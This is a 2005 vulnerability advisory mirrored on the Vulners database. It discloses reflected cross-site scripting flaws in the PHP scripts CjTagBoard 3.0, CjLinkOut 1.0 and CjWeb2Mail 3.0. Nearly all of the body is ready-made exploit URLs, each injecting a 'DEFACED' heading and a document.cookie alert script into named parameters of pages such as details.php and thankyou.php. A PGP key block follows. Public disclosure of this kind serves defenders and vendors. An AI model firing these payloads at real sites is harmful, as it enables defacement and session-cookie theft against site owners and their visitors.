Vulners
Lucene search
cjXSS.txt
`######################################################################
[Psymera Advisory #1] CjTagBoard 3.0 - CjLinkOut 1.0 - CjWeb2Mail 3.0
######################################################################
Software: CjTagBoard
CjLinkOut
CjWeb2Mail
Versions: CjTagBoard =3.0
CjLinkOut =1.0
CjWeb2Mail =3.0
Language: PHP
Type: Cross Side Script
Risc: Low
Examples: A] CjTagBoard XSS
B] CjLinkOut XSS
C] CjWeb2Mail XSS
Exploitation: remote
Date: 07 Sep 2005
Vendor: Cj Desing
Page: http://www.cj-design.com/
Author: Psymera
e-mail: [email protected]
######################################################################
-----------------
A] CjTagBoard XSS
-----------------
http://[target]/[folder]/details.php?date=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?time=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?name=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?ip=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/details.php?agent=<h1>DEFACED</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/display.php?msg=<h1>DEFACED</h1><script>alert(document.cookie);</script>
----------------
B] CjLinkOut XSS
----------------
http://[target]/[folder]/top.php?123="><h1>hola</h1><script>alert(document.cookie);</script><
-----------------
C] CjWeb2Mail XSS
-----------------
http://[target]/[folder]/thankyou.php?name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&name=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&message=<h1>Defaced</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/thankyou.php?sent=1&show_ip=yes&ip=<h1>deface</h1><script>alert(document.cookie);</script>
http://[target]/[folder]/web2mail.php?error_messages=yes&emsg=<h1>Deface</h1><script>alert(document.cookie);</script>
#######################################################################
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0
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
=V+P0
-----END PGP PUBLIC KEY BLOCK-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2005 00:00Current
7.4High risk
Vulners AI Score7.4